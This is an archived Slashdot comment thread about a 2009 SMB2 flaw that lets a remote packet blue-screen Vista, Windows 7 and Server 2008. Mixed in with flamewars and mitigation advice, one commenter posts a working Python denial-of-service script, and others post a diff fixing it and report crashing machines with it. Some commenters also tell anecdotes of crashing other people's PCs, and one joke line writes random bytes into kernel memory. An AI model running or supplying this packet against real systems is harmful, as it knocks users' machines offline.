Slashdot Mirror
Windows 7 Reintroduces Remote BSoD
David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."
If it relies on a SMB2 request it is most likely restricted form request inside the LAN.
Either way, still bad.
You could also do the same to some Linux builds in the good old days. Im sure this will be fixed soon
...half the world is behind a NAT setup now, and the other half has Windows firewall enabled. Windows update exists now so people will be able to patch quickly and easily when a patch arrives.
Realistically this isn't going to effect many people like the old exploit did.
Still, it's quite comical, maybe this is Microsoft's take on the saying "The old ones are the best". So much for their secure development practices, there's really no excuse for them not picking this one up before release.
It's incredibly unlikely to ever affect anyo
http://twitter.com/onion2k
need to rebind a key in fluxbox and dig out my "spank" keycap from 2003....this exploit was pretty effective though, being the modern day equivalent of a highway driver with a tow missile.
Good people go to bed earlier.
- Shiny-new interface.
- No annoying "are you sure" popups every 30 seconds like Vista.
- Can run on a 1 gigabyte machine without slowing to a crawl.
It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
Although I don't think Windows 7's feature list is stable yet, and I expect to see this one pulled before the release.
Pity.
You must be new here.
lollerskates
Having actually tried this on three windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".
"Commodore Amiga is better!"
"No Atari ST is better!"
"No Amiga!"
"No Atari!"
"Amiga!"
"Atari!"
Oh that's not the debate you were looking for? Sorry. Let me update that ancient debate for the modern world:
"Apple Macintosh is better!"
"No Microsoft PC is better!"
"No Apple!"
"No Microsoft!"
"Apple!"
"Microsoft!"
(and ancient debate... just as juvenile today as it was 20 years ago)
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.
And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.
http://rocknerd.co.uk
...that my fellow Boston Public School graduates are writing for seclists.org.
Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "
Yes, because we been done had seen that explot in the pasts.
Dear $DEITY, are there no proof readers or editors alive on these sites?
they don't like introducing "new" things
A slight correction, they like to introduce new things when it suits them. Why the rewrite of SMB into SMB2? Well, it has some technological advantages you would expect but according to Wikipedia:
SMB 2 has two big benefits to Microsoft. The first is clear intellectual property ownership. SMB 1 was originally designed by IBM and was shipped on a wide variety of non-Windows operating systems such as SCO Xenix, OS/2 and DEC VMS (Pathworks). It was partially standardised by X/Open and also had draft standards for IETF which lapsed. (See http://ubiqx.org/cifs/Intro.html for historical detail).
The second benefit is a clean break. Microsoft's SMB1 code has to work with a huge variety of SMB clients and servers. A large number of items in the protocol are optional (such as short and long filenames), there are many infolevels for commands (selecting what structure is returned to a particular request), Unicode was a later addition etc. With SMB2 there is significantly reduced compatibility testing (currently only other Windows Vista clients and servers). Additionally the code is a lot less complex since there is far less variability (e.g. there is no need to worry about having Unicode and non-Unicode code paths as SMB2 requires Unicode support).
So you can see they like to introduce new things when it means they have clear intellectual property ownership rights over it and also a lot less work for them. They also don't have to be backwards compatible with their own products.
While SAMBA 4.0 has experimental support for SMB2 interfacing, I'm guessing the "clear intellectual property" could spell trouble moving forward for Tridgell and the SAMBA team.
My work here is dung.
Let me Loony Tunes that up for you:
Wabbit Season!
Duck Season!
Wabbit Season!
Duck Season!
Summation 2
Apple was better then too.
IT departments are going to keep everything patched, and individuals aren't going to do it to themselves on their LANS. Between firewalls and NATs, it's not going to happen over the internet. Really, the only situation that I can imagine this happening is perhaps on a university network.
Don't take life so seriously. No one makes it out alive.
Windows 7 enables firewall by default, so wouldn't it practically stop this anyways for ordinary clients?
Hi. I'm an adult. I work as a software engineer.
I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.
I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.
If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.
1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.
2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.
3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.
4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.
"And not exploitable out of the box since SMB and SMBv2 are both firewalled"
What do you mean, is this firewall the software one built into Vista or an external one. If so thn it's relying on the same TCP/IP stack to protect it.
Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008
:) normal value should be "\x00\x00"
/joke
The exploit (which is actually ridiculously simple) goes as follows:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -->
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Current problem solution: disable the SMB protocol on your infrastructure..
Now please excuse me, I have go and play a bit with our network admin..
I needed to change a few things to get it to work for me.
I added "import socket" and changed "socket()" to "socket.socket(socket.AF_INET, socket.SOCK_STREAM)"
Hardly
Ooohhhhh, my head.
It's NOT me! It's the meds! I'm on 1000mg of Fukitol.
Or to be more apt (for slashdot)... some people prefer Ford, some prefer Dodge, others still prefer Toyota. Gas is better for some applications, while Diesel is better for others, while electric is better for others.
When a new car line comes out, new defects are to be expected on occasion. Sometimes there are even defects present that were fixed in previous models.
--- Smb-Bsod2.py 2009-09-08 09:35:58.000000000 -0500
+++ Smb-Bsod.py 2009-09-08 09:22:12.000000000 -0500
@@ -1,6 +1,7 @@
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
+import socket
from time import sleep
host = "IP_ADDR", 445
@@ -22,7 +23,7 @@
"\x30\x30\x32\x00"
)
-s = socket()
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.send(buff)
I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.
When in danger or in doubt, run in circles, scream and shout. --Robert A. Heinlein
The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.
Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have twist and stretch like taffy to make the case"?
It wouldn't be so bad but the body of the submission is incredibly slanted, almost more than some of the replies.
Politics is the art of looking for trouble, finding it everywhere, diagnosing it incorrectly and applying the wrong fix.
My sample size of "one" is obviously not conclusive, but I just tested this on Win 7 Enterprise.
To my disappointment, the Win7 box didn't BSOD.
So, which is the one who falls for the Bugs Bunny Argument Reversal trick?
M$Borg: Microsoft!
MacBoi: Apple!
M$Borg: Microsoft!
MacBoi: Apple!
M$Borg: Microsoft!
MacBoi: *slight pause*
MacBoi: Microsoft!
M$Borg: Apple!
MacBoi: Microsoft!
M$Borg: Apple!
MacBoi: Okay, you win. Apple.
M$Borg: Wait... what?
Let us hope Samba does not replicate this with its SMB2 Server.
Comment removed based on user account deletion
Speaking of going back to the '90s...
Why is /. using frames?
Oh, I'm sure on the back end it's some web 2.0 dynamic XCSS crap, but on the front end, it looks like a frame, it walks like a frame, it quacks like a frame.
It's a frame.
In firefox 3, I go to slashdot.org. Then I click a link to the IT section. Browser address bar still reads "slashdot.org" (no IT.)
I click a story link, then click the back button.
The browser goes back to slashdot.org, not it.slashdot.org.
Seriously, WTF?
None since. (5 days since install now) It was an upgrade over Vista. It was going like going down Nostalgia Lane.
Out of any sufficiently large community, some will engage in the sort of things you describe, or similar or complementary things. Corporate marketing campaigns are largely relying upon evoking those sentiments in the people they target (irrational 'we're #1' mentality without substantial real justification).
1) The chances of making every last Linux user refrain from that are about as likely as having every last Windows user refrain from considering every last willing Linux user an elitist snob who engages in what you describe.
2) That is true, though the severity of your example is far far less bad. I would use one of the various local privelege escalation vulnerabilities (some which were in the kernel undiscovered almost as long as this was in Windows), though even that isn't quite as severe as an unprivileged remote access crash in some measures (in others, admittedly, DoS is much less bad than privilege escalation, though I rarely hear of Windows infrastructures banking on avoiding local privilege escalation much).
3) Again, this may be true of some of the community, it is also true of Windows community (look at a few random message boards, you'll see windows users looking equally foolish)
4) I don't see a correlation between meme-spouting and linux usage. I also see no evidence that Linux people like xkcd any more than non-linux people (though I don't see how xkcd is construed as a particularly bad thing).
In short, if you want a community larger than 30-50 people that is completely devoid of people who fail to meet your standards, you might as well give up on any community.
XML is like violence. If it doesn't solve the problem, use more.
Fixed the subject line for you.
But none of those vehicles are self crashing.
Change is certain; progress is not obligatory.
So I'm reading a lot about this is no big deal because most places have it firewalled off, or most people are behind NAT, etc, etc...
OK, well, tell that to a place like a college that has 50,000 student accounts who all need access to file servers to get their files. You can't just turn off file sharing or block them on the firewall. All it takes is for one 1337 user to show off his mighty hacker skillz by BSOD'ing the servers to ruin things.
At least where I work we are still at 2003 Server -- thankfully.
see this http://www.heise.de/security/Luecke-in-Windows-Vista-und-7-ermoeglicht-Neustart-aus-der-Ferne--/news/meldung/144986 (german) heise tested the avaliable expoit and found vista affected but not windows 7
hahaha only on slashdot would that be modded 'informative'
nice work :)
Works on fully patched Server 2008 too
Yes, I would imagine so.
And this is why: JUDGMENT OF THE COURT OF FIRST INSTANCE (Grand Chamber)
17 September 2007
Are you seriously thinking they might renege on a punishment (samba interoperability documentation) dealt out at the cost of half a billion euros?
When this packet hits a pocket on a socket on a port,
Your whole damn OS pauses to abort...
kmem russian roulette: Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
... this can't be possible. Windows is made by *professionals*. If anything, those Linux amateurs are just trying to smear Microsoft with lies. .... jokes aside... It's a shame that microsoft has so much fackin revenue and yet their products are always seemingly half-assed. Throw another million at it! The guy who discovered this exploit should be on your payroll! ... oh wait.. the execs and stockholders aren't rich enough yet!
I wonder how the math works out when comparing advertising and investing in politicians (lobbies) vs developing a solid product in terms of ROI.
My favorite SMB2 exploits are detailed here.
Unfortunately, any group tends to have it's selection of self-important, infantile, self-righteous whiners. Equally unfortunately, they tend to be the more vocal members of said groups.
Don't let the leetiods scare you off, there are plenty of sane linux users or admins around here. Filter out the rest and all will be well.
Mind you, Linux is for those that have a reason to use it (even if the reason is just curiosity), so exempting the leetiots perhaps you need a stronger reason yet to "join the community," just don't worry that a frontal lobotomy is a requirement for such.
i love win 7, i have been running it on my laptop since the public beta came out, i have not found anything i dont like, if this is the worst thing you can come up with about windows 7. as far as i am concerned, its as good as xp or better.
Um, fail? Check the comment line above your import.
'Cause this can be prevented pretty easily by blocking the SMB ports, and if you're a business you'd be insane not to have a firewall anyway.
I've abandoned my search for truth; now I'm just looking for some useful delusions.
watch out! antisec is headed to your favorite desktop ;o
Back in October 1998, Microsoft fixed a vulnerability in Internet Explorer 4 where a dotless IP address (represented as a single, unsigned 32-bit integer, which was legal in IPv4) would be treated as being on the local network rather than on the Internet at large. Basically, their programmers took a shortcut and assumed "no dots = local". (MS98-016)
This was re-introduced in IE 5 three years later and had to be fixed AGAIN. (MS01-051)
I've been waiting to see if they end up re-introducing this one, or if they learned their lesson well enough the last time.
As Joel Spolsky points out, this is exactly what happens when you rewrite software. The old software had lots of bug fixes. If your development shop made a particular mistake once, it's likely to do it again when you reimplement. It's unclear whether this was the case for IE 5 (no idea if that area of the code was rewritten), but it seems like this may have bitten Microsoft with the teardrop vulnerability.
Me and my coworker tried this on an updated Windows 2008 today and none of us could believe what happened. The server just dies mid-air and throws a proud BSOD.
Am i the only one surprised something like this could slip through all the supposed testing done by Microsoft? Have they even ran a fuzzer against their code at all? If blatantly obvious holes like this goes unseen in the new TCP/IP SMB2 code rest assured a whole slew of new holes will be found later.
Funniest thing is that this dont affects XP while Microsoft touts Windows 7/2008 as the safest os ever. I guess its all marketing and just blatantly nothing done about security other than to blame everything on the user by passing every security decission onto the user with UAC.
HTTP/1.1 400
I've only been able to get this to work against Vista Ultimate SP2 and Windows Server 2008 SP2. I've not gotten this to work on Windows 7 RTM and Windows 2008 RTM yet... and yes, I disable the firewalls to be sure.
Windows is such a super sick beast that can not exist without vulnerabilities. Every hole and BSoD is not a big. It is classical Windows feature. :)
Welcome back, "teardrop" BSoD!
Watch out Marty....the Flux capacitor is at full capacity and a Smurf attack is imminent!
WTF? Over?
I think you'd get alcohol poisoning half-way through the drinking game.
But I have fond memories of the exploit called Win Nuke to cause the BSOD. Back in the day, I was a freshman in college and a football player on our floor was continuously giving me a hard time. In those days, we telnetted into the DEC Alpha to check our email. Also, in those days our IPs were statically assigned and we had no firewall. Those were quite obviously better, more trusting days of the internet. Anyhow, one day I waited until I knew he was in his room and checking email from his computer. I used finger on UNIX to get his IP address. Then, nuke away! I could here him banging, cussing, and throwing his stuff around. So, whenever I needed a little fun, I simply delivered that little exploit. One day he came back from a drunken binge and went to check his email and I felt it was a perfect time to test his patience level. After carefully delivering the little packet, I heard a smashing sound. My guess is he decided to do a body slam, WWF style, on his PC. As I walked by I casually asked what happened as I saw the computer smashed to smithereens. He told me to, "Get outta here, shit nugget!" It was all I could do to keep from bursting out laughing. Moral: Leave the IT guy alone.
The bug is yet another Vista 7 failure due to M$'s inclusion of digital restrictions management. M$ has proved once again Windoze 7 is Vista Service Pack as this "bug" also affects Vista and Vista Server 2008, all of which comes at the cost to your freedom and security.
--
Friends don't help friends install M$ junk.
Friends do assist M$ addicted friends in committing suicide.
I already had my share of BSoDs on Windows 7. Moved back to XP. Hadn't a BSoD there on the exact same machine ever.
WTF? You sound like a baby. Stop crying and face the fscking world already!
Not tested, but Petri is a pretty solid resource: http://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm
body massage!
I dont care im still very found of 7 (running rtm for a month was a pleasant experience) im actually signed up to throw a party, although I wont throw any party I just want free copy of 7 lol. Everything OS isnt perfect 7 is definitely a nice change of pace from XP, and Vista like ME should be forgotten asap.
Visit my Forums?
Just to clarify the comment prior to mine...
Simply adding a linefeed in the right place in the comment would perform the import properly. In other words, the GP post says:
and it should be
I love it when Microsoft self-sabotages. Windows 7 was already being called "Vista: Fixed"; now it's introducing fun new ways for "Vista" to fail. But let's be fair to Microsoft; they don't like introducing "new" things, so in tune with this philosophy, they're merely re-releasing an old problem and packaging it differently ;)
This is actually introduced with Vista, and not Win7 -- making the title and summary just wrong. Something new and different for /....
Ummm... well done and truly informative, the way you copied and pasted directly from the security bulletin linked to in TFS...
Back in the mid/late 90's, we had a Btrieve-based app running on our Novell network. The client app ran on each local workstation, Win95 at the time. One of the resident computer experts (helpdesk guy) discovered a "tool" that would allow him to send the ping o'death to any machine on the network. He amused himself merrily, randomly crashing machines for nearly a week. Problem was, each time he crashed a machine, the Btrieve database would get corrupted or records would be left locked, requiring intervention by me to get things working again. Once I figured out who was doing it, I warned him to stop. He didn't, so I reported him to senior management. He was fired immediately.
Looks like the winnuke application has been updated already. LOL
http://rapidshare.com/files/277352935/WinnukeV7.zip.html
Of course it is _VERY_SERIOUS_, un-priviliged user-land electively crashes kernel of every machine it can route TCP packets to, WTF are you stupid or something?
Verified BSOD with windows Vista basic, have to move the "from socket import socket" to it's own line without being commented.
Ah the good old days of early IRC, watching people go poof on a regular basis.
---- Booth was a patriot ----
proof-of-concept code can sometimes contain subtle or minor bugs on purpose so that someone completely uninitiated can't just go and abuse it.
XP isn't affected because XP can't speak that protocol.
To be fair, this vulnerability seems to prove that that none of Vista, WS2k8, or Win7 know how to speak SMB 2.0 (correctly) either... ;-)
Guess the author has never seen #! lines or the file command then...
I've just tested it on 3 of my Server 2008 R2 machines here (final build, technet ftw). It was unable to crash any of them. I wonder if 2008R2 has any new SMB code we don't know about yet?
Note: all 3 2008R2 machines have open (guest-authable) fileshares available via SMB.
What's wrong Twitter? All of your accounts in karma hell? BTW, your suicide comment you made only shows your stupidity.
Friends don't help friends install Communist Linsux.
SMB2 is not required, it can be disabled.
From an Administrative prompt issue the follow:
"net stop mrxsmb20"
To make the change permanent, also issue:
"sc config lanmanworkstation depend= bowser/mrxsmb10/nsi"
"sc config mrxsmb20 start= disabled"
Seriously, why is everyone getting so bent over something that is a three-line permanent fix?
FOOL! You're NOT supposed to PROVIDE THE FIX!!!!!!!!
I can already see the script-kiddy whordes descending on your post!!!!!
Windows 7 hasn't even launched yet, so don't cry too hard.
but....I thought Windows 7 was the most secure version of Windows ever?
Um, you're an idiot.
That's one way to crash a Windows 7 party.
Also, it isn't related to the TCP/IP stacks, or the teardrop attack. It is a totally unrelated except that it causes a BSoD.
Your post implies that this is somehow redeeming to Microsoft. It is actually worse - the problem has been there for so long, it is present in Win7 too, thus the vector of attack is larger. This speaks volumes about the real security of new Microsoft products.
There are times like the recent article about how Microsoft photoshopped a black guy out of some marketing material destined for Poland where there are no black people, where the frantic voices of slashdot bashing Microsoft I find irrational and too strident.
And then there are the far more numerous articles where there's some real problem with a current Microsoft product where some people feel determined to defend Microsoft no matter how much they must stretch reason or reach to find offense in the poster.
Your post is more of the latter than the former -- and so I must wonder how it became moderated so well. Twice interesting and once overrated. That's maybe more than I would give it.
Help stamp out iliturcy.
I have tested it on Windows 2008 x64 and Windows 7 (had to allow SMB through the firewall on 7 as it was blocked by default)
And got some lovely blue screens to admire!
http://blog.tommed.co.uk/2009/09/08/how-to-blue-screen-windows-remotely-with-python
Tested this on my own system, using my Linux dev box to attack Windows 7 running inside VirtualBox 3. No luck, Windows just sits there.
So basically several recent version of Windows, the ones using the 'SMB2' protocol, can be crashed if someone on the same LAN sends an crafted packet?
How is this possible from a technical point of view?
It must have something to do with the way Windows is conceived.
I can imagine the "fix"... The fix is going to be something like "If packet starts with ..." then drop the packet.
However that's a shitty way to 'fix' the problem. The problem is obviously deeply engrained in the Windows is conceived and the way Windows is conceived is deeply engrained in pathetic programming practice.
Seriously, all Microsofties, how the heck is it even possible that a machine can be remotely crashed just by receiving a malformed packet?
How can you buy such mediocrity?
I realize /. is full of paid M$ astrotufers but there's seriously not much you can do here to take MS's defense.
How is this even possible?
A remote BSOD?
Woaw. Just plain woaw.
For weeks I have been listening to some IT guys tell me how great and foolproof 7 is. I am going to have so much fun this afternoon!
What's a BSoD?
I am not devoid of humor.
don't let the facts get in the way of a good microsoft bash eh lads?
your all a bunch of stupid trolls.
The software maker said the latest issue affects the "release candidate" version of Windows 7, but not the final version that was completed in July. Also, the recently completed Windows Server 2008 R2 is not vulnerable, Microsoft said, nor are the earlier Windows XP and Windows 2000 operating systems.
Right so R2, XP and 2000 are not vulnerable and it looks like Vista needs a patch - kudos to Ms for fixing it quickly- more than most companies do.
http://news.zdnet.com/2100-9595_22-340550.html